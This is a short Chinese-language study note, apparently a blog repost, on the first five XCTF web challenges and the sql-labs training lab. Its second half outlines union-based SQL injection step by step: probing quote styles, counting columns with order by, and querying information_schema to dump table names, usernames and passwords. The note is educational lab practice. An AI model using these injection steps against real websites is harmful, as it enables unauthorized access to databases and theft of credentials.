Java教程

攻防世界前五题和sql-labs

本文主要是介绍攻防世界前五题和sql-labs,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

攻防世界

1.在地址前加上view source:

 更多工具-web开发者工具-查看器

更多工具-页面源代码(CTRL+u)

 

 

 2.robots协议也叫做robots.txt

 robots里面的文件不能自己爬取,所以要手动输入

 

 3.backup

常见的备份文件名后缀名是.bak

在地址后面加上/index.php.bak

 

 通过VS打开

 4.

 cookie是用户客户端计算机保存的信息

 打开web开发者工具,打开存储,点第一个,查看代码

 5.disabled 规定禁用 input

 打开web开发者工具-查看器-查看代码

 将disabled删去

 sql-labs

1.判断字段数,从1开始试,4报错,有三个字段

 

 2.判断注入点

 

 ?id=1'或者')或者"或者")还有数字注入(用and语句1=2来判断)

第二步,判断字段数用order by 1(2,3···)直至报错

第三步,将id=1改成id=0,联合查询当前数据库名union select database()

第四步,查数据库中的表名

select 1,table_name from information_schema.tables where table_schema=database()

查询出一个结果,用limit 1,1(2,1·····)查其余表名

第五步,查字段名,select 1,column_name from information_schema.columns where table_schema=database() and table_name='表名',用limit 1,1(2,1·····)查其余表名

最后一步:查数据select 1,username from 表名

select 1,password from 表名

第五题和第六题判断了','),","),")}都不对,不会了。(图片照的太模糊了,就没全传上去,对不起!)

这篇关于攻防世界前五题和sql-labs的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!